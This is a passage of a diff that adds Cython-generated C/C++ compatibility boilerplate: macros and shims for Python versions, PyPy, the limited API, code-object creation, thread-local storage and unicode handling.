#endif + #ifndef CYTHON_METH_FASTCALL + #define CYTHON_METH_FASTCALL (PY_VERSION_HEX >= 0x030700A1) + #endif + #ifndef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 1 + #endif + #ifndef CYTHON_PEP487_INIT_SUBCLASS + #define CYTHON_PEP487_INIT_SUBCLASS 1 + #endif + #if PY_VERSION_HEX < 0x03050000 + #undef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 0 + #elif !defined(CYTHON_PEP489_MULTI_PHASE_INIT) + #define CYTHON_PEP489_MULTI_PHASE_INIT 1 + #endif + #ifndef CYTHON_USE_MODULE_STATE + #define CYTHON_USE_MODULE_STATE 0 + #endif + #if PY_VERSION_HEX < 0x030400a1 + #undef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE 0 + #elif !defined(CYTHON_USE_TP_FINALIZE) + #define CYTHON_USE_TP_FINALIZE 1 + #endif + #if PY_VERSION_HEX < 0x030600B1 + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #elif !defined(CYTHON_USE_DICT_VERSIONS) + #define CYTHON_USE_DICT_VERSIONS (PY_VERSION_HEX < 0x030C00A5) + #endif + #if PY_VERSION_HEX < 0x030700A3 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 + #elif !defined(CYTHON_USE_EXC_INFO_STACK) + #define CYTHON_USE_EXC_INFO_STACK 1 + #endif + #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC + #define CYTHON_UPDATE_DESCRIPTOR_DOC 1 + #endif +#endif +#if !defined(CYTHON_FAST_PYCCALL) +#define CYTHON_FAST_PYCCALL (CYTHON_FAST_PYCALL && PY_VERSION_HEX >= 0x030600B1) +#endif +#if !defined(CYTHON_VECTORCALL) +#define CYTHON_VECTORCALL (CYTHON_FAST_PYCCALL && PY_VERSION_HEX >= 0x030800B1) +#endif +#define CYTHON_BACKPORT_VECTORCALL (CYTHON_METH_FASTCALL && PY_VERSION_HEX < 0x030800B1) +#if CYTHON_USE_PYLONG_INTERNALS + #if PY_MAJOR_VERSION < 3 + #include "longintrepr.h" + #endif + #undef SHIFT + #undef BASE + #undef MASK + #ifdef SIZEOF_VOID_P + enum { __pyx_check_sizeof_voidp = 1 / (int)(SIZEOF_VOID_P == sizeof(void*)) }; + #endif +#endif +#ifndef __has_attribute + #define __has_attribute(x) 0 +#endif +#ifndef __has_cpp_attribute + #define __has_cpp_attribute(x) 0 +#endif +#ifndef CYTHON_RESTRICT + #if defined(__GNUC__) + #define CYTHON_RESTRICT __restrict__ + #elif defined(_MSC_VER) && _MSC_VER >= 1400 + #define CYTHON_RESTRICT __restrict + #elif defined (__STDC_VERSION__) && __STDC_VERSION__ >= 199901L + #define CYTHON_RESTRICT restrict + #else + #define CYTHON_RESTRICT + #endif +#endif +#ifndef CYTHON_UNUSED + #if defined(__cplusplus) + /* for clang __has_cpp_attribute(maybe_unused) is true even before C++17 + * but leads to warnings with -pedantic, since it is a C++17 feature */ + #if ((defined(_MSVC_LANG) && _MSVC_LANG >= 201703L) || __cplusplus >= 201703L) + #if __has_cpp_attribute(maybe_unused) + #define CYTHON_UNUSED [[maybe_unused]] + #endif + #endif + #endif +#endif +#ifndef CYTHON_UNUSED +# if defined(__GNUC__) +# if !(defined(__cplusplus)) || (__GNUC__ > 3 || (__GNUC__ == 3 && __GNUC_MINOR__ >= 4)) +# define CYTHON_UNUSED __attribute__ ((__unused__)) +# else +# define CYTHON_UNUSED +# endif +# elif defined(__ICC) || (defined(__INTEL_COMPILER) && !defined(_MSC_VER)) +# define CYTHON_UNUSED __attribute__ ((__unused__)) +# else +# define CYTHON_UNUSED +# endif +#endif +#ifndef CYTHON_UNUSED_VAR +# if defined(__cplusplus) + template void CYTHON_UNUSED_VAR( const T& ) { } +# else +# define CYTHON_UNUSED_VAR(x) (void)(x) +# endif +#endif +#ifndef CYTHON_MAYBE_UNUSED_VAR + #define CYTHON_MAYBE_UNUSED_VAR(x) CYTHON_UNUSED_VAR(x) +#endif +#ifndef CYTHON_NCP_UNUSED +# if CYTHON_COMPILING_IN_CPYTHON +# define CYTHON_NCP_UNUSED +# else +# define CYTHON_NCP_UNUSED CYTHON_UNUSED +# endif +#endif +#define __Pyx_void_to_None(void_result) ((void)(void_result), Py_INCREF(Py_None), Py_None) +#ifdef _MSC_VER + #ifndef _MSC_STDINT_H_ + #if _MSC_VER < 1300 + typedef unsigned char uint8_t; + typedef unsigned short uint16_t; + typedef unsigned int uint32_t; + #else + typedef unsigned __int8 uint8_t; + typedef unsigned __int16 uint16_t; + typedef unsigned __int32 uint32_t; + #endif + #endif + #if _MSC_VER < 1300 + #ifdef _WIN64 + typedef unsigned long long __pyx_uintptr_t; + #else + typedef unsigned int __pyx_uintptr_t; + #endif + #else + #ifdef _WIN64 + typedef unsigned __int64 __pyx_uintptr_t; + #else + typedef unsigned __int32 __pyx_uintptr_t; + #endif + #endif +#else + #include + typedef uintptr_t __pyx_uintptr_t; +#endif +#ifndef CYTHON_FALLTHROUGH + #if defined(__cplusplus) + /* for clang __has_cpp_attribute(fallthrough) is true even before C++17 + * but leads to warnings with -pedantic, since it is a C++17 feature */ + #if ((defined(_MSVC_LANG) && _MSVC_LANG >= 201703L) || __cplusplus >= 201703L) + #if __has_cpp_attribute(fallthrough) + #define CYTHON_FALLTHROUGH [[fallthrough]] + #endif + #endif + #ifndef CYTHON_FALLTHROUGH + #if __has_cpp_attribute(clang::fallthrough) + #define CYTHON_FALLTHROUGH [[clang::fallthrough]] + #elif __has_cpp_attribute(gnu::fallthrough) + #define CYTHON_FALLTHROUGH [[gnu::fallthrough]] + #endif + #endif + #endif + #ifndef CYTHON_FALLTHROUGH + #if __has_attribute(fallthrough) + #define CYTHON_FALLTHROUGH __attribute__((fallthrough)) + #else + #define CYTHON_FALLTHROUGH + #endif + #endif + #if defined(__clang__) && defined(__apple_build_version__) + #if __apple_build_version__ < 7000000 + #undef CYTHON_FALLTHROUGH + #define CYTHON_FALLTHROUGH + #endif + #endif +#endif +#ifdef __cplusplus + template + struct __PYX_IS_UNSIGNED_IMPL {static const bool value = T(0) < T(-1);}; + #define __PYX_IS_UNSIGNED(type) (__PYX_IS_UNSIGNED_IMPL::value) +#else + #define __PYX_IS_UNSIGNED(type) (((type)-1) > 0) +#endif +#if CYTHON_COMPILING_IN_PYPY == 1 + #define __PYX_NEED_TP_PRINT_SLOT (PY_VERSION_HEX >= 0x030800b4 && PY_VERSION_HEX < 0x030A0000) +#else + #define __PYX_NEED_TP_PRINT_SLOT (PY_VERSION_HEX >= 0x030800b4 && PY_VERSION_HEX < 0x03090000) +#endif +#define __PYX_REINTERPRET_FUNCION(func_pointer, other_pointer) ((func_pointer)(void(*)(void))(other_pointer)) + +#ifndef __cplusplus + #error "Cython files generated with the C++ option must be compiled with a C++ compiler." +#endif +#ifndef CYTHON_INLINE + #if defined(__clang__) + #define CYTHON_INLINE __inline__ __attribute__ ((__unused__)) + #else + #define CYTHON_INLINE inline + #endif +#endif +template +void __Pyx_call_destructor(T& x) { + x.~T(); +} +template +class __Pyx_FakeReference { + public: + __Pyx_FakeReference() : ptr(NULL) { } + __Pyx_FakeReference(const T& ref) : ptr(const_cast(&ref)) { } + T *operator->() { return ptr; } + T *operator&() { return ptr; } + operator T&() { return *ptr; } + template bool operator ==(const U& other) const { return *ptr == other; } + template bool operator !=(const U& other) const { return *ptr != other; } + template bool operator==(const __Pyx_FakeReference& other) const { return *ptr == *other.ptr; } + template bool operator!=(const __Pyx_FakeReference& other) const { return *ptr != *other.ptr; } + private: + T *ptr; +}; + +#define __PYX_BUILD_PY_SSIZE_T "n" +#define CYTHON_FORMAT_SSIZE_T "z" +#if PY_MAJOR_VERSION < 3 + #define __Pyx_BUILTIN_MODULE_NAME "__builtin__" + #define __Pyx_DefaultClassType PyClass_Type + #define __Pyx_PyCode_New(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos)\ + PyCode_New(a+k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos) +#else + #define __Pyx_BUILTIN_MODULE_NAME "builtins" + #define __Pyx_DefaultClassType PyType_Type +#if PY_VERSION_HEX >= 0x030B00A1 + static CYTHON_INLINE PyCodeObject* __Pyx_PyCode_New(int a, int p, int k, int l, int s, int f, + PyObject *code, PyObject *c, PyObject* n, PyObject *v, + PyObject *fv, PyObject *cell, PyObject* fn, + PyObject *name, int fline, PyObject *lnos) { + PyObject *kwds=NULL, *argcount=NULL, *posonlyargcount=NULL, *kwonlyargcount=NULL; + PyObject *nlocals=NULL, *stacksize=NULL, *flags=NULL, *replace=NULL, *empty=NULL; + const char *fn_cstr=NULL; + const char *name_cstr=NULL; + PyCodeObject *co=NULL, *result=NULL; + PyObject *type, *value, *traceback; + PyErr_Fetch(&type, &value, &traceback); + if (!(kwds=PyDict_New())) goto end; + if (!(argcount=PyLong_FromLong(a))) goto end; + if (PyDict_SetItemString(kwds, "co_argcount", argcount) != 0) goto end; + if (!(posonlyargcount=PyLong_FromLong(p))) goto end; + if (PyDict_SetItemString(kwds, "co_posonlyargcount", posonlyargcount) != 0) goto end; + if (!(kwonlyargcount=PyLong_FromLong(k))) goto end; + if (PyDict_SetItemString(kwds, "co_kwonlyargcount", kwonlyargcount) != 0) goto end; + if (!(nlocals=PyLong_FromLong(l))) goto end; + if (PyDict_SetItemString(kwds, "co_nlocals", nlocals) != 0) goto end; + if (!(stacksize=PyLong_FromLong(s))) goto end; + if (PyDict_SetItemString(kwds, "co_stacksize", stacksize) != 0) goto end; + if (!(flags=PyLong_FromLong(f))) goto end; + if (PyDict_SetItemString(kwds, "co_flags", flags) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_code", code) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_consts", c) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_names", n) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_varnames", v) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_freevars", fv) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_cellvars", cell) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_linetable", lnos) != 0) goto end; + if (!(fn_cstr=PyUnicode_AsUTF8AndSize(fn, NULL))) goto end; + if (!(name_cstr=PyUnicode_AsUTF8AndSize(name, NULL))) goto end; + if (!(co = PyCode_NewEmpty(fn_cstr, name_cstr, fline))) goto end; + if (!(replace = PyObject_GetAttrString((PyObject*)co, "replace"))) goto end; + if (!(empty = PyTuple_New(0))) goto end; + result = (PyCodeObject*) PyObject_Call(replace, empty, kwds); + end: + Py_XDECREF((PyObject*) co); + Py_XDECREF(kwds); + Py_XDECREF(argcount); + Py_XDECREF(posonlyargcount); + Py_XDECREF(kwonlyargcount); + Py_XDECREF(nlocals); + Py_XDECREF(stacksize); + Py_XDECREF(replace); + Py_XDECREF(empty); + if (type) { + PyErr_Restore(type, value, traceback); + } + return result; + } +#elif PY_VERSION_HEX >= 0x030800B2 && !CYTHON_COMPILING_IN_PYPY + #define __Pyx_PyCode_New(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos)\ + PyCode_NewWithPosOnlyArgs(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos) +#else + #define __Pyx_PyCode_New(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos)\ + PyCode_New(a, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos) +#endif +#endif +#if PY_VERSION_HEX >= 0x030900A4 || defined(Py_IS_TYPE) + #define __Pyx_IS_TYPE(ob, type) Py_IS_TYPE(ob, type) +#else + #define __Pyx_IS_TYPE(ob, type) (((const PyObject*)ob)->ob_type == (type)) +#endif +#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_Is) + #define __Pyx_Py_Is(x, y) Py_Is(x, y) +#else + #define __Pyx_Py_Is(x, y) ((x) == (y)) +#endif +#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_IsNone) + #define __Pyx_Py_IsNone(ob) Py_IsNone(ob) +#else + #define __Pyx_Py_IsNone(ob) __Pyx_Py_Is((ob), Py_None) +#endif +#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_IsTrue) + #define __Pyx_Py_IsTrue(ob) Py_IsTrue(ob) +#else + #define __Pyx_Py_IsTrue(ob) __Pyx_Py_Is((ob), Py_True) +#endif +#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_IsFalse) + #define __Pyx_Py_IsFalse(ob) Py_IsFalse(ob) +#else + #define __Pyx_Py_IsFalse(ob) __Pyx_Py_Is((ob), Py_False) +#endif +#define __Pyx_NoneAsNull(obj) (__Pyx_Py_IsNone(obj) ? NULL : (obj)) +#if PY_VERSION_HEX >= 0x030900F0 && !CYTHON_COMPILING_IN_PYPY + #define __Pyx_PyObject_GC_IsFinalized(o) PyObject_GC_IsFinalized(o) +#else + #define __Pyx_PyObject_GC_IsFinalized(o) _PyGC_FINALIZED(o) +#endif +#ifndef CO_COROUTINE + #define CO_COROUTINE 0x80 +#endif +#ifndef CO_ASYNC_GENERATOR + #define CO_ASYNC_GENERATOR 0x200 +#endif +#ifndef Py_TPFLAGS_CHECKTYPES + #define Py_TPFLAGS_CHECKTYPES 0 +#endif +#ifndef Py_TPFLAGS_HAVE_INDEX + #define Py_TPFLAGS_HAVE_INDEX 0 +#endif +#ifndef Py_TPFLAGS_HAVE_NEWBUFFER + #define Py_TPFLAGS_HAVE_NEWBUFFER 0 +#endif +#ifndef Py_TPFLAGS_HAVE_FINALIZE + #define Py_TPFLAGS_HAVE_FINALIZE 0 +#endif +#ifndef Py_TPFLAGS_SEQUENCE + #define Py_TPFLAGS_SEQUENCE 0 +#endif +#ifndef Py_TPFLAGS_MAPPING + #define Py_TPFLAGS_MAPPING 0 +#endif +#ifndef METH_STACKLESS + #define METH_STACKLESS 0 +#endif +#if PY_VERSION_HEX <= 0x030700A3 || !defined(METH_FASTCALL) + #ifndef METH_FASTCALL + #define METH_FASTCALL 0x80 + #endif + typedef PyObject *(*__Pyx_PyCFunctionFast) (PyObject *self, PyObject *const *args, Py_ssize_t nargs); + typedef PyObject *(*__Pyx_PyCFunctionFastWithKeywords) (PyObject *self, PyObject *const *args, + Py_ssize_t nargs, PyObject *kwnames); +#else + #define __Pyx_PyCFunctionFast _PyCFunctionFast + #define __Pyx_PyCFunctionFastWithKeywords _PyCFunctionFastWithKeywords +#endif +#if CYTHON_METH_FASTCALL + #define __Pyx_METH_FASTCALL METH_FASTCALL + #define __Pyx_PyCFunction_FastCall __Pyx_PyCFunctionFast + #define __Pyx_PyCFunction_FastCallWithKeywords __Pyx_PyCFunctionFastWithKeywords +#else + #define __Pyx_METH_FASTCALL METH_VARARGS + #define __Pyx_PyCFunction_FastCall PyCFunction + #define __Pyx_PyCFunction_FastCallWithKeywords PyCFunctionWithKeywords +#endif +#if CYTHON_VECTORCALL + #define __pyx_vectorcallfunc vectorcallfunc + #define __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET PY_VECTORCALL_ARGUMENTS_OFFSET + #define __Pyx_PyVectorcall_NARGS(n) PyVectorcall_NARGS((size_t)(n)) +#elif CYTHON_BACKPORT_VECTORCALL + typedef PyObject *(*__pyx_vectorcallfunc)(PyObject *callable, PyObject *const *args, + size_t nargsf, PyObject *kwnames); + #define __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET ((size_t)1 << (8 * sizeof(size_t) - 1)) + #define __Pyx_PyVectorcall_NARGS(n) ((Py_ssize_t)(((size_t)(n)) & ~__Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET)) +#else + #define __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET 0 + #define __Pyx_PyVectorcall_NARGS(n) ((Py_ssize_t)(n)) +#endif +#if PY_VERSION_HEX < 0x030900B1 + #define __Pyx_PyType_FromModuleAndSpec(m, s, b) ((void)m, PyType_FromSpecWithBases(s, b)) + typedef PyObject *(*__Pyx_PyCMethod)(PyObject *, PyTypeObject *, PyObject *const *, size_t, PyObject *); +#else + #define __Pyx_PyType_FromModuleAndSpec(m, s, b) PyType_FromModuleAndSpec(m, s, b) + #define __Pyx_PyCMethod PyCMethod +#endif +#ifndef METH_METHOD + #define METH_METHOD 0x200 +#endif +#if CYTHON_COMPILING_IN_PYPY && !defined(PyObject_Malloc) + #define PyObject_Malloc(s) PyMem_Malloc(s) + #define PyObject_Free(p) PyMem_Free(p) + #define PyObject_Realloc(p) PyMem_Realloc(p) +#endif +#if CYTHON_COMPILING_IN_LIMITED_API + #define __Pyx_PyCode_HasFreeVars(co) (PyCode_GetNumFree(co) > 0) + #define __Pyx_PyFrame_SetLineNumber(frame, lineno) +#else + #define __Pyx_PyCode_HasFreeVars(co) (PyCode_GetNumFree(co) > 0) + #define __Pyx_PyFrame_SetLineNumber(frame, lineno) (frame)->f_lineno = (lineno) +#endif +#if CYTHON_COMPILING_IN_LIMITED_API + #define __Pyx_PyThreadState_Current PyThreadState_Get() +#elif !CYTHON_FAST_THREAD_STATE + #define __Pyx_PyThreadState_Current PyThreadState_GET() +#elif PY_VERSION_HEX >= 0x03060000 + #define __Pyx_PyThreadState_Current _PyThreadState_UncheckedGet() +#elif PY_VERSION_HEX >= 0x03000000 + #define __Pyx_PyThreadState_Current PyThreadState_GET() +#else + #define __Pyx_PyThreadState_Current _PyThreadState_Current +#endif +#if CYTHON_COMPILING_IN_LIMITED_API +static CYTHON_INLINE void *__Pyx_PyModule_GetState(PyObject *op) +{ + void *result; + result = PyModule_GetState(op); + if (!result) + Py_FatalError("Couldn't find the module state"); + return result; +} +#endif +#define __Pyx_PyObject_GetSlot(obj, name, func_ctype) __Pyx_PyType_GetSlot(Py_TYPE(obj), name, func_ctype) +#if CYTHON_COMPILING_IN_LIMITED_API + #define __Pyx_PyType_GetSlot(type, name, func_ctype) ((func_ctype) PyType_GetSlot((type), Py_##name)) +#else + #define __Pyx_PyType_GetSlot(type, name, func_ctype) ((type)->name) +#endif +#if PY_VERSION_HEX < 0x030700A2 && !defined(PyThread_tss_create) && !defined(Py_tss_NEEDS_INIT) +#include "pythread.h" +#define Py_tss_NEEDS_INIT 0 +typedef int Py_tss_t; +static CYTHON_INLINE int PyThread_tss_create(Py_tss_t *key) { + *key = PyThread_create_key(); + return 0; +} +static CYTHON_INLINE Py_tss_t * PyThread_tss_alloc(void) { + Py_tss_t *key = (Py_tss_t *)PyObject_Malloc(sizeof(Py_tss_t)); + *key = Py_tss_NEEDS_INIT; + return key; +} +static CYTHON_INLINE void PyThread_tss_free(Py_tss_t *key) { + PyObject_Free(key); +} +static CYTHON_INLINE int PyThread_tss_is_created(Py_tss_t *key) { + return *key != Py_tss_NEEDS_INIT; +} +static CYTHON_INLINE void PyThread_tss_delete(Py_tss_t *key) { + PyThread_delete_key(*key); + *key = Py_tss_NEEDS_INIT; +} +static CYTHON_INLINE int PyThread_tss_set(Py_tss_t *key, void *value) { + return PyThread_set_key_value(*key, value); +} +static CYTHON_INLINE void * PyThread_tss_get(Py_tss_t *key) { + return PyThread_get_key_value(*key); +} +#endif +#if PY_MAJOR_VERSION < 3 + #if CYTHON_COMPILING_IN_PYPY + #if PYPY_VERSION_NUM < 0x07030600 + #if defined(__cplusplus) && __cplusplus >= 201402L + [[deprecated("`with nogil:` inside a nogil function will not release the GIL in PyPy2 < 7.3.6")]] + #elif defined(__GNUC__) || defined(__clang__) + __attribute__ ((__deprecated__("`with nogil:` inside a nogil function will not release the GIL in PyPy2 < 7.3.6"))) + #elif defined(_MSC_VER) + __declspec(deprecated("`with nogil:` inside a nogil function will not release the GIL in PyPy2 < 7.3.6")) + #endif + static CYTHON_INLINE int PyGILState_Check(void) { + return 0; + } + #else // PYPY_VERSION_NUM < 0x07030600 + #endif // PYPY_VERSION_NUM < 0x07030600 + #else + static CYTHON_INLINE int PyGILState_Check(void) { + PyThreadState * tstate = _PyThreadState_Current; + return tstate && (tstate == PyGILState_GetThisThreadState()); + } + #endif +#endif +#if CYTHON_COMPILING_IN_CPYTHON || defined(_PyDict_NewPresized) +#define __Pyx_PyDict_NewPresized(n) ((n <= 8) ? PyDict_New() : _PyDict_NewPresized(n)) +#else +#define __Pyx_PyDict_NewPresized(n) PyDict_New() +#endif +#if PY_MAJOR_VERSION >= 3 || CYTHON_FUTURE_DIVISION + #define __Pyx_PyNumber_Divide(x,y) PyNumber_TrueDivide(x,y) + #define __Pyx_PyNumber_InPlaceDivide(x,y) PyNumber_InPlaceTrueDivide(x,y) +#else + #define __Pyx_PyNumber_Divide(x,y) PyNumber_Divide(x,y) + #define __Pyx_PyNumber_InPlaceDivide(x,y) PyNumber_InPlaceDivide(x,y) +#endif +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX > 0x030600B4 && CYTHON_USE_UNICODE_INTERNALS +#define __Pyx_PyDict_GetItemStrWithError(dict, name) _PyDict_GetItem_KnownHash(dict, name, ((PyASCIIObject *) name)->hash) +static CYTHON_INLINE PyObject * __Pyx_PyDict_GetItemStr(PyObject *dict, PyObject *name) { + PyObject *res = __Pyx_PyDict_GetItemStrWithError(dict, name); + if (res == NULL) PyErr_Clear(); + return res; +} +#elif PY_MAJOR_VERSION >= 3 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07020000) +#define __Pyx_PyDict_GetItemStrWithError PyDict_GetItemWithError +#define __Pyx_PyDict_GetItemStr PyDict_GetItem +#else +static CYTHON_INLINE PyObject * __Pyx_PyDict_GetItemStrWithError(PyObject *dict, PyObject *name) { +#if CYTHON_COMPILING_IN_PYPY + return PyDict_GetItem(dict, name); +#else + PyDictEntry *ep; + PyDictObject *mp = (PyDictObject*) dict; + long hash = ((PyStringObject *) name)->ob_shash; + assert(hash != -1); + ep = (mp->ma_lookup)(mp, name, hash); + if (ep == NULL) { + return NULL; + } + return ep->me_value; +#endif +} +#define __Pyx_PyDict_GetItemStr PyDict_GetItem +#endif +#if CYTHON_USE_TYPE_SLOTS + #define __Pyx_PyType_GetFlags(tp) (((PyTypeObject *)tp)->tp_flags) + #define __Pyx_PyType_HasFeature(type, feature) ((__Pyx_PyType_GetFlags(type) & (feature)) != 0) + #define __Pyx_PyObject_GetIterNextFunc(obj) (Py_TYPE(obj)->tp_iternext) +#else + #define __Pyx_PyType_GetFlags(tp) (PyType_GetFlags((PyTypeObject *)tp)) + #define __Pyx_PyType_HasFeature(type, feature) PyType_HasFeature(type, feature) + #define __Pyx_PyObject_GetIterNextFunc(obj) PyIter_Next +#endif +#if CYTHON_USE_TYPE_SPECS && PY_VERSION_HEX >= 0x03080000 +#define __Pyx_PyHeapTypeObject_GC_Del(obj) {\ + PyTypeObject *type = Py_TYPE(obj);\ + assert(__Pyx_PyType_HasFeature(type, Py_TPFLAGS_HEAPTYPE));\ + PyObject_GC_Del(obj);\ + Py_DECREF(type);\ +} +#else +#define __Pyx_PyHeapTypeObject_GC_Del(obj) PyObject_GC_Del(obj) +#endif +#if CYTHON_COMPILING_IN_LIMITED_API + #define CYTHON_PEP393_ENABLED 1 + #define __Pyx_PyUnicode_READY(op) (0) + #define __Pyx_PyUnicode_GET_LENGTH(u) PyUnicode_GetLength(u) + #define __Pyx_PyUnicode_READ_CHAR(u, i) PyUnicode_ReadChar(u, i) + #define __Pyx_PyUnicode_MAX_CHAR_VALUE(u) ((void)u, 1114111U) + #define __Pyx_PyUnicode_KIND(u) ((void)u, (0)) + #define __Pyx_PyUnicode_DATA(u) ((void*)u) + #define __Pyx_PyUnicode_READ(k, d, i) ((void)k, PyUnicode_ReadChar((PyObject*)(d), i)) + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != PyUnicode_GetLength(u)) +#elif PY_VERSION_HEX > 0x03030000 && defined(PyUnicode_KIND) + #define CYTHON_PEP393_ENABLED 1 + #if PY_VERSION_HEX >= 0x030C0000 + #define __Pyx_PyUnicode_READY(op) (0) + #else + #define __Pyx_PyUnicode_READY(op) (likely(PyUnicode_IS_READY(op)) ?\ + 0 : _PyUnicode_Ready((PyObject *)(op))) + #endif + #define __Pyx_PyUnicode_GET_LENGTH(u) PyUnicode_GET_LENGTH(u) + #define __Pyx_PyUnicode_READ_CHAR(u, i) PyUnicode_READ_CHAR(u, i) + #define __Pyx_PyUnicode_MAX_CHAR_VALUE(u) PyUnicode_MAX_CHAR_VALUE(u) + #define __Pyx_PyUnicode_KIND(u) ((int)PyUnicode_KIND(u)) + #define __Pyx_PyUnicode_DATA(u) PyUnicode_DATA(u) + #define __Pyx_PyUnicode_READ(k, d, i) PyUnicode_READ(k, d, i) + #define __Pyx_PyUnicode_WRITE(k, d, i, ch) PyUnicode_WRITE(k, d, i, (Py_UCS4) ch) + #if PY_VERSION_HEX >= 0x030C0000 + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != PyUnicode_GET_LENGTH(u)) + #else + #if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x03090000 + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != (likely(PyUnicode_IS_READY(u)) ? PyUnicode_GET_LENGTH(u) : ((PyCompactUnicodeObject *)(u))->wstr_length)) + #else + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != (likely(PyUnicode_IS_READY(u)) ? PyUnicode_GET_LENGTH(u) : PyUnicode_GET_SIZE(u))) + #endif + #endif +#else + #define CYTHON_PEP393_ENABLED 0 + #define PyUnicode_1BYTE_KIND 1 + #define PyUnicode_2BYTE_KIND 2 + #define PyUnicode_4BYTE_KIND 4 + #define __Pyx_PyUnicode_READY(op) (0) + #define __Pyx_PyUnicode_GET_LENGTH(u) PyUnicode_GET_SIZE(u) + #define __Pyx_PyUnicode_READ_CHAR(u, i) ((Py_UCS4)(PyUnicode_AS_UNICODE(u)[i])) + #define __Pyx_PyUnicode_MAX_CHAR_VALUE(u) ((sizeof(Py_UNICODE) == 2) ? 65535U : 1114111U) + #define __Pyx_PyUnicode_KIND(u) ((int)sizeof(Py_UNICODE)) + #define __Pyx_PyUnicode_DATA(u) ((void*)PyUnicode_AS_UNICODE(u)) + #define __Pyx_PyUnicode_READ(k, d, i) ((void)(k), (Py_UCS4)(((Py_UNICODE*)d)[i])) + #define __Pyx_PyUnicode_WRITE(k, d, i, ch) (((void)(k)), ((Py_UNICODE*)d)[i] = (Py_UNICODE) ch) + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != PyUnicode_GET_SIZE(u)) +#endif +#if CYTHON_COMPILING_IN_PYPY + #define __Pyx_PyUnicode_Concat(a, b) PyNumber_Add(a, b) + #define __Pyx_PyUnicode_ConcatSafe(a, b) PyNumber_Add(a, b) +#else + #define __Pyx_PyUnicode_Concat(a, b) PyUnicode_Concat(a, b) + #define __Pyx_PyUnicode_ConcatSafe(a, b) ((unlikely((a) == Py_None) || unlikely((b) == Py_None)) ?\ + PyNumber_Add(a, b) : __Pyx_PyUnicode_Concat(a, b)) +#endif +#if CYTHON_COMPILING_IN_PYPY + #if !defined(PyUnicode_DecodeUnicodeEscape) + #define PyUnicode_DecodeUnicodeEscape(s, size, errors) PyUnicode_Decode(s, size, "unicode_escape", errors) + #endif + #if !defined(PyUnicode_Contains) || (PY_MAJOR_VERSION == 2 && PYPY_VERSION_NUM < 0x07030500) + #undef PyUnicode_Contains + #define PyUnicode_Contains(u, s) PySequence_Contains(u, s) + #endif + #if !defined(PyByteArray_Check) + #define PyByteArray_Check(obj) PyObject_TypeCheck(obj, &PyByteArray_Type) + #endif + #if !defined(PyObject_Format) + #define PyObject_Format(obj, fmt) PyObject_CallMethod(obj, "__format__", "O", fmt) + #endif +#endif +#define __Pyx_PyString_FormatSafe(a, b) ((unlikely((a) == Py_None || (PyString_Check(b) && !PyString_CheckExact(b)))) ? PyNumber_Remainder(a, b) : __Pyx_PyString_Format(a, b)) +#define __Pyx_PyUnicode_FormatSafe(a, b) ((unlikely((a) == Py_None || (PyUnicode_Check(b) && !PyUnicode_CheckExact(b)))) ? PyNumber_Remainder(a, b) : PyUnicode_Format(a, b)) +#if PY_MAJOR_VERSION >= 3 + #define __Pyx_PyString_Format(a, b) PyUnicode_Format(a, b) +#else + #define __Pyx_PyString_Format(a, b) PyString_Format(a, b) +#endif +#if PY_MAJOR_VERSION < 3 && !defined(PyObject_ASCII) + #define PyObject_ASCII(o) PyObject_Repr(o) +#endif +#if PY_MAJOR_VERSION >= 3 + #define PyBaseString_Type PyUnicode_Type + #define PyStringObject PyUnicodeObject + #define PyString_Type PyUnicode_Type + #define PyString_Check PyUnicode_Check + #define PyString_CheckExact PyUnicode_CheckExact +#ifndef PyObject_Unicode + #define PyObject_Unicode PyObject_Str +#endif +#endif +#if PY_MAJOR_VERSION >= 3 + #define __Pyx_PyBaseString_Check(obj) PyUnicode_Check(obj) + #define __Pyx_PyBaseString_CheckExact(obj) PyUnicode_CheckExact(obj) +#else + #define __Pyx_PyBaseString_Check(obj) (PyString_Check(obj) || PyUnicode_Check(obj)) + #define __Pyx_PyBaseString_CheckExact(obj) (PyString_CheckExact(obj) || PyUnicode_CheckExact(obj)) +#endif +#if CYTHON_COMPILING_IN_CPYTHON + #define __Pyx_PySequence_ListKeepNew(obj)\ + (likely(PyList_CheckExact(obj) && Py_REFCNT(obj) == 1) ? __Pyx_NewRef(obj) : PySequence_List(obj)) +#else + #define __Pyx_PySequence_ListKeepNew(obj) PySequence_List(obj) +#endif +#ifndef PySet_CheckExact + #define PySet_CheckExact(obj) __Pyx_IS_TYPE(obj, &PySet_Type) +#endif +#if PY_VERSION_HEX >= 0x030900A4 + #define __Pyx_SET_REFCNT(obj, refcnt) 